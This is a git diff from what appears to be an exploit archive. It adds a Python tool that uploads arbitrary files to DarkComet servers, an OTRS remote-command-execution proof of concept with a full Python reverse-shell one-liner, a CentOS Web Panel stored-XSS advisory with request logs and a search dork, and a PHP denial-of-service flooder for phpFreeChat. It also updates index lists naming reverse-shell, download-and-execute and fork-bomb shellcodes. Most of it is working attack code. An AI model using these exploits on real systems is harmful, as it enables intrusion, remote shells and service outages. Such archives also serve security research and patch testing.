+    return ARC4.new(key).decrypt(unhexlify(data)).upper()
+
+def encrypt(data, key):
+    return hexlify(ARC4.new(key).encrypt(data)).upper()
+
+def upload(domain, port, key, local, remote, test):
+    remote = remote.replace('\\', '/')
+    f = open(local, "rb")
+    client = socket(AF_INET, SOCK_STREAM)
+    client.settimeout(5.0)
+    client.connect((domain, port))
+    try:
+        idtype = decrypt(client.recv(12), key)
+        if idtype != b'IDTYPE':
+            bad('Key seems to be wrong!')
+            return
+
+        filetransfer = encrypt('FILETRANSFER111|%s' % test, key)
+        client.send(filetransfer)
+        client.recv(3)
+        client.send(b'FILEBOF' + remote.encode('utf-8') + b'|111')
+        client.recv(1)
+        content = f.read()
+        current = 0
+        while (current + 1024) < len(content):
+            current += client.send(content[current:current+1024])
+            client.recv(1)
+        client.send(content[current:len(content)])
+        client.recv(1)
+        client.send(b'FILEEOF')
+        client.recv(1)
+        client.send(b'FILEEND')
+        client.close()
+        return True
+    except error as e:
+        client.close()
+    return False
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description='bruteforce socket handle and upload arbitrary files to DarkComet servers')
+    parser.add_argument('--port', '-p', dest='port', type=int, default=1604, help='port of the DarkComet server')
+    parser.add_argument('--key', '-k', dest='key', default='#KCMDDC51#-890', help='password of the DarkComet server')
+    parser.add_argument('--start', '-s', dest='start', type=int, default=0)
+    parser.add_argument('--end', '-e', dest='end', type=int, default=2400)
+
+    parser.add_argument('domain', help='domain name/ip of the DarkComet server')
+    parser.add_argument('local', help='file name of the local file')
+    parser.add_argument('remote', help='remote relative file path')
+
+    args = parser.parse_args()
+
+    for i in range(args.start, args.end, 4):
+        # Increment by 4 because Windows seems to only
+        # generate socket handles that are multiples of 4
+        normal('Trying ' + str(i))
+        if upload(args.domain, args.port, args.key, args.local, args.remote, i):
+            good('Uploaded successfully!')
+            break
+        sleep(2)
\ No newline at end of file
diff --git a/exploits/perl/webapps/43853.txt b/exploits/perl/webapps/43853.txt
new file mode 100644
index 000000000..e3ff059f6
--- /dev/null
+++ b/exploits/perl/webapps/43853.txt
@@ -0,0 +1,42 @@
+# Exploit Title: OTRS Shell Access 
+# Date: 21-01-2018
+# Exploit Author: Bæln0rn
+# Vendor Homepage: https://www.otrs.com/
+# Software Link: http://ftp.otrs.org/pub/otrs/
+# Version: 4.0.1 - 4.0.26, 5.0.0 - 5.0.24, 6.0.0 - 6.0.1
+# Tested on: OTRS 5.0.2/CentOS 7.2.1511
+# CVE : CVE-2017-16921
+
+CVE-2017-16921: 
+"In OTRS 6.0.x up to and including 6.0.1, OTRS 5.0.x up to and including 5.0.24, and OTRS 4.0.x up to and including 4.0.26, an attacker who is logged into OTRS as an agent can manipulate form parameters (related to PGP) and execute arbitrary shell commands with the permissions of the OTRS or web server user."
+
+OTRS 5.0.2 PoC:
+1. Authenticate to an agent account. <path>/index.pl
+
+2. Open "Admin" tab. <path>/index.pl?Action=Admin
+
+3. Open "SysConfig" link. <path>/index.pl?Action=AdminSysConfig
+
+4. Find the "Crypt:PGP" subgroup. <path>/index.pl?Action=AdminSysConfig;Subaction=Edit;SysConfigSubGroup=Crypt%3A%3APGP;SysConfigGroup=Framework
+
+5. Manipulate form parameters and use "Update" button to save:
+
+"PGP"
+-Default: No
+-New: Yes
+
+"PGP::Bin"
+-Default: /usr/bin/gpg 
+-New: <shell command including executables the webserver user has execute permissions for, no options>
+-PoC (Reverse Python Shell): /usr/bin/python
+
+"PGP::Options"
+-Default: --homedir /opt/otrs/.gnupg/ --batch --no-tty --yes
+-New: <any command options>
+-PoC (Reverse Python Shell): -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<YOURIP>",<YOURLISTENINGPORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
+
+6. Open "Admin" tab. <path>/index.pl?Action=Admin
+
+7. Open "PGP Keys" to execute saved command.  <path>/index.pl?Action=AdminPGP
+
+Behavior will vary based on commands. The above PoC opened a stable, no TTY, reverse shell under the "apache" user. The page eventually timed out with a 502 error, but the web application seems otherwise unaffected.  Killing the shell before timeout advances the web application to the proper "PGP Management" page. The exploit can be repeated unlimited times with step #7 above.
\ No newline at end of file
diff --git a/exploits/php/webapps/43850.txt b/exploits/php/webapps/43850.txt
new file mode 100644
index 000000000..23b44ea1c
--- /dev/null
+++ b/exploits/php/webapps/43850.txt
@@ -0,0 +1,231 @@
+Document Title:
+===============
+CentOS Web Panel v0.9.8.12 - Multiple Persistent Web Vulnerabilities
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1836
+
+
+Release Date:
+=============
+2018-01-19
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1836
+
+
+Common Vulnerability Scoring System:
+====================================
+4.4
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+CentOS Web Panel - Free Web Hosting control panel is designed for quick and easy management of (Dedicated & VPS) servers without of 
+need to use ssh console for every little thing. There is lot's of options and features for server management in this control panel.
+CWP automatically installs full LAMP on your server (apache,php, phpmyadmin, webmail, mailserver…).
+
+(Copy of the Homepage: http://centos-webpanel.com/features )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple persistent web vulnerabilities in the official CentOS Web Panel v0.9.8.12.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2017-01-19: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+CWP
+Product: CentOS Web Panel - (CWP) 0.9.8.12
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
+Multiple persistent validation web vulnerabilities has been discovered in the official CentOS Web Panel v0.9.8.12.
+The vulnerability allows remote attackers to inject own malicious script codes to the application-side of the 
+affected vulnerable modules.
+
+The vulnerabilities are located in the `id` and `email_address` parameters of the `index.php` file POST method request. 
+Remote attackers are able to inject script code to the POST method request to manipulate the item listing output context. 
+The request method to inject is POST and the attack vector is persistent on the application-side. The injection points are 
+the both add POST method requests and the execution point occurs in the output location of both modules.
+
+The security risk of the web vulnerabilities are estimated as medium with a cvss (common vulnerability scoring system) count of 4.4. 
+Exploitation of the persistent web vulnerabilities requires a low privileged web-application user account and low user interaction. 
+Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects 
+to malicious source and persistent manipulation of affected or connected application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] phpini_editor
+[+] mail_add-new
+				
+Vulnerable File(s):
+[+] index.php
+
+Vulnerable Parameter(s):
+[+] id
+[+] email_address
+
+
+Proof of Concept (PoC):
+=======================
+The web vulnerabilities can be exploited by remote attackers with low privileged user account and low user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+Dork(s):
+"powered by CentOS-WebPanel.com"
+
+
+--- PoC Session Logs [POST] ---
+Status: 200[OK]
+POST http://localhost:2030/index.php?module=phpini_editor 
+Mime Type[text/html]
+   Request Header:
+      Host[localhost:2030]
+      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Referer[http://localhost:2030/index.php?module=phpini_editor]
+      Cookie[cwpsrv-3cc0cea69668d490e1029c2a41ce5df3=8fnvi0bqgjj162mqklruu8clq5; PHPSESSID=8dsrha0ivd80kkgukvklgvmct1]
+      Connection[keep-alive]
+   POST-Daten:
+      id[%3E%22%3CPAYLOAD INJECTION POINT!+src]
+      del[]
+   Response Header:
+      Server[Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips PHP/5.4.27]
+      X-Powered-By[PHP/5.4.27]
+      Keep-Alive[timeout=5, max=94]
+      Connection[Keep-Alive]
+      Transfer-Encoding[chunked]
+      Content-Type[text/html]
+
+PoC: POST via Delete function in phpini_editor via Add your custom settings! input
+<div class="row">
+<h3>Simple php.ini editor</h3>
+File Location: /home/test-dom/public_html/php.ini
+<br><br>magic_quotes_gpc=>"<%3E%22%3CPERSISTENT SCRIPT CODE PAYLOAD EXECUTION!+src>
+ Removed!<META HTTP-EQUIV='refresh' CONTENT='1'>	
+                </div><!-- End .row -->
+            </div><!-- End contentwrapper -->
+        </div><!-- End #content -->
+    </div><!-- End #wrapper -->
+
+Reference(s):
+http://localhost:2030/index.php?module=phpini_editor 
+
+
+
+--- PoC Session Logs [POST] ---
+Status: 200[OK]
+POST http://localhost:2030/index.php?module=mail_add-new 
+Mime Type[text/html]
+   Request Header:
+      Host[localhost:2030]
+      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Referer[http://localhost:2030/index.php?module=mail_add-new]
+      Cookie[cwpsrv-3cc0cea69668d490e1029c2a41ce5df3=8fnvi0bqgjj162mqklruu8clq5; PHPSESSID=8dsrha0ivd80kkgukvklgvmct1]
+      Connection[keep-alive]
+   POST-Daten:
+      ifpost[yes]
+      email_address[%3E%22%3CPAYLOAD INJECTION POINT!+src]
+      domain[test-domain.com]
+      password[%3E%22%3CPAYLOAD INJECTION POINT!+src]
+   Response Header:
+      Server[Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips PHP/5.4.27]
+      X-Powered-By[PHP/5.4.27]
+      Keep-Alive[timeout=5, max=100]
+      Connection[Keep-Alive]
+      Transfer-Encoding[chunked]
+      Content-Type[text/html]
+
+
+PoC: POST via add Mailbox in email input 
+<div class="row">
+<br>Email domain <b>test-domain.com</b> created.
+<br>Mailbox <b>a>"<%3E%22%3CPERSISTENT SCRIPT CODE PAYLOAD EXECUTION!+src>@test-domain.com</b> created.
+<br><h3>Create a New Email Account or Forwarder (MailBox/Forwarder)</h3>
+Here you can create a new email account or forwarder.
+<br><br>
+<div class='row'>
+	<div class='col-lg-8'>
+		<div class='panel panel-default chart gradient'>
+        <div class='panel-heading'>
+			<h4><span class='icon16 icomoon-icon-bars'></span>
+				<span>Create a New Email Account (MailBox)</span>
+			</h4>
+        <a href='#' class='minimize'>Minimize</a>
+        </div>
+        <div class='panel-body' style='padding-bottom:0;'>
+<form action='' method= 'post'>
+<input type='hidden' name='ifpost' size='0' value='yes'>
+<table><tr><td>
+
+Reference(s):
+http://localhost:2030/index.php?module=mail_add-new 
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerabilities can be patched by a sanitize in the vulnerable `id` and `email address` parameters of the index.php file POST method request. 
+Disallow usage of special chars and restrict the parameter input to prevent script code injection attacks. Filter in the output error location 
+or the item listing the vulnerable location were the code point occurs.
+
+
+Security Risk:
+==============
+The security risk of the application-side input validation vulnerabilities in the web-application are estimated as medium. (CVSS 4.4)
+
+
+Credits & Authors:
+==================
+Benjamin K.M. [bkm@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or 
+implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
+case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its 
+suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
+or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface 
+websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories 
+or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, 
+phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.
\ No newline at end of file
diff --git a/exploits/php/webapps/43852.php b/exploits/php/webapps/43852.php
new file mode 100644
index 000000000..5e5e4a6c9
--- /dev/null
+++ b/exploits/php/webapps/43852.php
@@ -0,0 +1,47 @@
+# Exploit Title: phpFreeChat 1.7 and earlier - Denial of Service
+# Version: 1.7 and earlier
+# Date: 21/01/2018
+# Vendor Homepage: http://www.phpfreechat.net
+# Software Link: http://www.phpfreechat.net/download
+# Exploit Author: A. Pakbaz
+# CVE : CVE-2018-5954
+####################################################
+<?php
+$host="http://example.com/path/index.php";	//Vulnerable Host
+$con_num=64;	//Number of Connections
+$proxy='';	//Proxy example http://127.0.0.1:8080
+$user_agent='';	//User-Agent
+$proxy=$proxy!='' ? "-x " . $proxy : '';
+$user_agent=$user_agent!='' ? "-A " . $user_agent : '';
+echo "##Vulnerability Discovered by A. Pakbaz\n##Exploit Author: A. Pakbaz\n";
+echo "##Contact: \x70\x61\x6b\x62\x61\x7a\x40\x70\x72\x6f\x74\x6f\x6e\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\n";
+echo "##PGP key: \x45\x33\x35\x35\x35\x32\x34\x43\x34\x44\x37\x45\x31\x36\x43\x38\x46\x38\x34\x38\x35\x41\x36\x46\x35\x31\x32\x39\x30\x34\x46\x35\x45\x44\x42\x45\x33\x43\x41\x41\n";
+function runf($id){
+global $con_num;
+global $host;
+global $proxy;
+global $user_agent;
+$i=$id*1000000/$con_num;
+$f=($id+1)*1000000/$con_num;
+for($num=$i; $num<$f; $num++){
+	`curl --url '$host' -X POST -d "pfc_ajax=1&f=handleRequest&cmd=%2Fconnect%20a95806d727683c9c42694214fe"$num"%200%20%22"$num"%22" -N --stderr /dev/null --compressed $proxy $user_agent`;
+	echo ".";	
+	}		
+}
+function fmaker($pno){
+global $con_num;
+if($pno>1){
+	$pid=pcntl_fork();
+	if($pid<0){
+		echo "\nError! Reduce the number of connections\n";
+		}
+	elseif($pid)
+		fmaker($pno-1);
+	else
+		runf($con_num-$pno);
+}
+elseif($pno==1)
+	runf($con_num-1);
+}
+fmaker($con_num);
+?>
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 6e2a61a46..68725fb77 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -37240,6 +37240,11 @@ id,file,description,date,author,type,platform,port
 43844,exploits/php/webapps/43844.txt,"Synology Photostation < 6.7.2-3429 - Multiple Vulnerabilities",2018-01-08,"GulfTech Security",webapps,php,
 43845,exploits/php/webapps/43845.txt,"D-Link DNS-343 ShareCenter < 1.05 - Command Injection",2018-01-15,"GulfTech Security",webapps,php,
 43846,exploits/php/webapps/43846.txt,"D-Link DNS-325 ShareCenter < 1.05B03 - Multiple Vulnerabilities",2018-01-15,"GulfTech Security",webapps,php,
+43848,exploits/java/webapps/43848.txt,"Oracle JDeveloper 11.1.x/12.x - Directory Traversal",2018-01-21,hyp3rlinx,webapps,java,
+43849,exploits/json/webapps/43849.txt,"Shopware 5.2.5/5.3 - Cross-Site Scripting",2018-01-21,Vulnerability-Lab,webapps,json,
+43850,exploits/php/webapps/43850.txt,"CentOS Web Panel 0.9.8.12 - Multiple Vulnerabilities",2018-01-21,Vulnerability-Lab,webapps,php,
+43852,exploits/php/webapps/43852.php,"PHPFreeChat 1.7 - Denial of Service",2018-01-21,"A. Pakbaz",webapps,php,
+43853,exploits/perl/webapps/43853.txt,"OTRS 5.0.x/6.0.x - Remote Command Execution",2018-01-21,Bæln0rn,webapps,perl,
 40542,exploits/php/webapps/40542.txt,"Student Information System (SIS) 0.1 - Authentication Bypass",2016-10-14,lahilote,webapps,php,
 40543,exploits/php/webapps/40543.txt,"Web Based Alumni Tracking System 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php,
 40544,exploits/php/webapps/40544.txt,"Simple Dynamic Web 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php,
@@ -37835,6 +37840,7 @@ id,file,description,date,author,type,platform,port
 43436,exploits/linux/webapps/43436.txt,"Zen Cart < 1.3.8a - SQL Injection",2008-09-04,"GulfTech Security",webapps,linux,
 43437,exploits/multiple/webapps/43437.txt,"PHP Topsites < 2.2 - Multiple Vulnerabilities",2003-01-13,"GulfTech Security",webapps,multiple,
 43438,exploits/multiple/webapps/43438.txt,"phpLinks < 2.1.2 - Multiple Vulnerabilities",2003-01-17,"GulfTech Security",webapps,multiple,
+43847,exploits/multiple/webapps/43847.py,"DarkComet (C2 Server) - File Upload",2018-01-15,"Pseudo Laboratories",webapps,multiple,
 43440,exploits/multiple/webapps/43440.txt,"P-Synch < 6.2.5 - Multiple Vulnerabilities",2003-05-30,"GulfTech Security",webapps,multiple,
 43441,exploits/multiple/webapps/43441.txt,"WinMX < 2.6 - Design Error",2003-06-02,"GulfTech Security",webapps,multiple,
 43442,exploits/multiple/webapps/43442.txt,"FTP Service < 1.2 - Multiple Vulnerabilities",2003-06-03,"GulfTech Security",webapps,multiple,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 758b15347..caf48c756 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -15,10 +15,10 @@ id,file,description,date,author,type,platform
 13254,shellcodes/bsd_x86/13254.c,"BSD/x86 - Reverse TCP (torootteam.host.sk:2222/TCP) Shell Shellcode (93 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
 13255,shellcodes/bsd_x86/13255.c,"BSD/x86 - execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
 13256,shellcodes/bsd/13256.c,"BSD/x86 - Reverse TCP (192.168.2.33:6969/TCP) Shell Shellcode (129 bytes)",2004-09-26,"Sinan Eren",shellcode,bsd
-13257,shellcodes/bsdi_x86/13257.txt,"BSDi/x86 - execve(/bin/sh) Shellcode (45 bytes)",2004-09-26,duke,shellcode,bsdi_x86
-13258,shellcodes/bsdi_x86/13258.txt,"BSDi/x86 - execve(/bin/sh) Shellcode (46 bytes)",2004-09-26,vade79,shellcode,bsdi_x86
+13257,shellcodes/bsdi_x86/13257.c,"BSDi/x86 - execve(/bin/sh) Shellcode (45 bytes)",2004-09-26,duke,shellcode,bsdi_x86
+13258,shellcodes/bsdi_x86/13258.c,"BSDi/x86 - execve(/bin/sh) Shellcode (46 bytes)",2004-09-26,vade79,shellcode,bsdi_x86
 13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve(/bin/sh) + ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86
-13261,shellcodes/freebsd/13261.txt,"FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,shellcode,freebsd
+13261,shellcodes/freebsd/13261.c,"FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,shellcode,freebsd
 13262,shellcodes/freebsd_x86/13262.txt,"FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes)",2008-09-12,suN8Hclf,shellcode,freebsd_x86
 13263,shellcodes/freebsd_x86/13263.txt,"FreeBSD/x86 - Reverse TCP (192.168.1.33:8000/TCP) cat /etc/passwd Shellcode (112 bytes)",2008-09-10,suN8Hclf,shellcode,freebsd_x86
 13264,shellcodes/freebsd_x86/13264.txt,"FreeBSD/x86 - Kill All Processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,shellcode,freebsd_x86
@@ -47,10 +47,10 @@ id,file,description,date,author,type,platform
 13288,shellcodes/generator/13288.c,"Linux/x86 - HTTP/1.x Requests Shellcode (18+/26+ bytes) (Generator)",2006-10-22,izik,shellcode,generator
 13289,shellcodes/generator/13289.c,"Windows/x86 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,shellcode,generator
 13290,shellcodes/ios/13290.txt,"iOS Version-independent - Null-Free Shellcode",2008-08-21,"Andy Davis",shellcode,ios
-13291,shellcodes/hardware/13291.txt,"Cisco IOS - New TTY + Privilege Level To 15 + Reverse (21/TCP) Virtual Terminal Shell Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware
-13292,shellcodes/hardware/13292.txt,"Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes)",2008-08-13,"Varun Uppal",shellcode,hardware
-13293,shellcodes/hardware/13293.txt,"Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware
-13295,shellcodes/hp-ux/13295.txt,"HP-UX - execve(/bin/sh) Shellcode (58 bytes)",2004-09-26,K2,shellcode,hp-ux
+13291,shellcodes/hardware/13291.asm,"Cisco IOS - New TTY + Privilege Level To 15 + Reverse (21/TCP) Virtual Terminal Shell Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware
+13292,shellcodes/hardware/13292.asm,"Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes)",2008-08-13,"Varun Uppal",shellcode,hardware
+13293,shellcodes/hardware/13293.asm,"Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware
+13295,shellcodes/hp-ux/13295.c,"HP-UX - execve(/bin/sh) Shellcode (58 bytes)",2004-09-26,K2,shellcode,hp-ux
 13296,shellcodes/linux_x86-64/13296.c,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)",2008-11-28,gat3way,shellcode,linux_x86-64
 13297,shellcodes/generator/13297.c,"Linux/x86-64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator)",2006-04-21,phar,shellcode,generator
 13298,shellcodes/linux_mips/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind TCP (4919/TCP) Shell (/bin/sh) Shellcode (276 bytes)",2008-08-18,vaicebine,shellcode,linux_mips
@@ -113,7 +113,7 @@ id,file,description,date,author,type,platform
 13355,shellcodes/linux_x86/13355.c,"Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() + Null-Free Shellcode (111+ bytes)",2006-10-22,izik,shellcode,linux_x86
 13356,shellcodes/linux_x86/13356.c,"Linux/x86 - setreuid() + Executes Command Shellcode (49+ bytes)",2006-08-02,bunker,shellcode,linux_x86
 13357,shellcodes/linux_x86/13357.c,"Linux/x86 - stdin re-open + /bin/sh exec Shellcode (39 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
-13358,shellcodes/linux_x86/13358.c,"Linux/x86 - execve(/bin/sh)  + Re-Use Of Strings In .rodata Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
+13358,shellcodes/linux_x86/13358.c,"Linux/x86 - execve(/bin/sh) + Re-Use Of Strings In .rodata Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
 13359,shellcodes/linux_x86/13359.c,"Linux/x86 - setuid(0) + /bin/sh execve() Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
 13360,shellcodes/linux_x86/13360.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid() Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
 13361,shellcodes/linux_x86/13361.c,"Linux/x86 - Bind TCP (2707/TCP) Shell Shellcode (84 bytes)",2006-07-04,oveRet,shellcode,linux_x86
@@ -264,11 +264,11 @@ id,file,description,date,author,type,platform
 13507,shellcodes/windows_x86/13507.txt,"Windows/x86 - Egg Omelet SEH Shellcode",2009-03-16,Skylined,shellcode,windows_x86
 13508,shellcodes/windows_x86/13508.asm,"Windows/x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)",2009-02-27,DATA_SNIPER,shellcode,windows_x86
 13509,shellcodes/windows_x86/13509.c,"Windows/x86 - PEB!NtGlobalFlags Shellcode (14 bytes)",2009-02-24,Koshi,shellcode,windows_x86
-13510,shellcodes/windows_x86/13510.c,"Windows/x86 (XP SP2)  (French) - cmd.exe Shellcode (32 bytes)",2009-02-20,Stack,shellcode,windows_x86
+13510,shellcodes/windows_x86/13510.c,"Windows/x86 (XP SP2) (French) - cmd.exe Shellcode (32 bytes)",2009-02-20,Stack,shellcode,windows_x86
 13511,shellcodes/windows_x86/13511.c,"Windows/x86 (XP SP2) - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,shellcode,windows_x86
-13512,shellcodes/windows_x86/13512.c,"Windows/x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,shellcode,windows_x86
-13513,shellcodes/windows_x86/13513.c,"Windows/x86 - PEB _Kernel32.dll_ ImageBase Finder + ASCII Printable Shellcode (49 bytes)",2008-09-03,Koshi,shellcode,windows_x86
-13514,shellcodes/windows_x86/13514.asm,"Windows/x86 - Reverse Connection + Download A File + Save + Execute Shellcode",2008-08-25,loco,shellcode,windows_x86
+13512,shellcodes/windows_x86/13512.c,"Windows/x86 - PEB 'Kernel32.dll' ImageBase Finder + Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,shellcode,windows_x86
+13513,shellcodes/windows_x86/13513.c,"Windows/x86 - PEB 'Kernel32.dll' ImageBase Finder + ASCII Printable Shellcode (49 bytes)",2008-09-03,Koshi,shellcode,windows_x86
+13514,shellcodes/windows_x86/13514.asm,"Windows/x86 - Reverse TCP + Download A File + Save + Execute Shellcode",2008-08-25,loco,shellcode,windows_x86
 13515,shellcodes/generator/13515.pl,"Windows/x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)",2008-03-14,"YAG KOHHA",shellcode,generator
 13516,shellcodes/windows_x86/13516.asm,"Windows/x86 - Download File + Execute Shellcode (192 bytes)",2007-06-27,czy,shellcode,windows_x86
 13517,shellcodes/windows_x86/13517.asm,"Windows/x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)",2007-06-14,Weiss,shellcode,windows_x86
@@ -279,9 +279,9 @@ id,file,description,date,author,type,platform
 13522,shellcodes/windows_x86/13522.c,"Windows/x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes)",2005-12-23,darkeagle,shellcode,windows_x86
 13523,shellcodes/windows_x86/13523.c,"Windows (NT/2000/XP) (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes)",2005-10-28,darkeagle,shellcode,windows_x86
 13524,shellcodes/windows_x86/13524.txt,"Windows (9x/NT/2000/XP) - Reverse Generic Without Loader (192.168.1.11:4919) Shellcode (249 bytes)",2005-08-16,"Matthieu Suiche",shellcode,windows_x86
-13525,shellcodes/windows_x86/13525.c,"Windows  (9x/NT/2000/XP) - PEB method Shellcode (29 bytes)",2005-07-26,loco,shellcode,windows_x86
-13526,shellcodes/windows_x86/13526.c,"Windows  (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes)",2005-01-26,twoci,shellcode,windows_x86
-13527,shellcodes/windows_x86/13527.c,"Windows (9x/NT/2000/XP) - PEB method Shellcode (35 bytes)",2005-01-09,oc192,shellcode,windows_x86
+13525,shellcodes/windows_x86/13525.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (29 bytes)",2005-07-26,loco,shellcode,windows_x86
+13526,shellcodes/windows_x86/13526.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes)",2005-01-26,twoci,shellcode,windows_x86
+13527,shellcodes/windows_x86/13527.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (35 bytes)",2005-01-09,oc192,shellcode,windows_x86
 13528,shellcodes/generator/13528.c,"Windows (XP/2000/2003) - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator)",2004-10-25,lion,shellcode,generator
 13529,shellcodes/windows_x86/13529.c,"Windows (XP/2000/2003) - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)",2004-10-25,lion,shellcode,windows_x86
 13530,shellcodes/windows_x86/13530.asm,"Windows (XP) - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) + Null-Free Shellcode",2004-09-26,"Peter Winter-Smith",shellcode,windows_x86
@@ -301,21 +301,21 @@ id,file,description,date,author,type,platform
 13570,shellcodes/freebsd_x86/13570.c,"FreeBSD/x86 - Bind TCP (1337/TCP) Shell (/bin/sh) Shellcode (167 bytes)",2009-12-24,sbz,shellcode,freebsd_x86
 13571,shellcodes/windows_x86/13571.c,"Windows/x86 (XP SP2) - calc.exe Shellcode (45 bytes)",2009-12-24,Stack,shellcode,windows_x86
 13572,shellcodes/linux_x86/13572.c,"Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes)",2009-12-24,$andman,shellcode,linux_x86
-13574,shellcodes/windows_x86/13574.c,"Windows/x86 (XP SP2)  (English / Arabic) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",shellcode,windows_x86
+13574,shellcodes/windows_x86/13574.c,"Windows/x86 (XP SP2) (English / Arabic) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",shellcode,windows_x86
 13576,shellcodes/linux_x86/13576.asm,"Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes)",2010-01-16,root@thegibson,shellcode,linux_x86
 13577,shellcodes/linux_x86/13577.txt,"Linux/x86 - setuid() + Break chroot (mkdir/chdir/chroot '...') + execve(/bin/sh) Shellcode (79 bytes)",2009-12-30,root@thegibson,shellcode,linux_x86
 13578,shellcodes/linux_x86/13578.txt,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (1)",2009-12-30,root@thegibson,shellcode,linux_x86
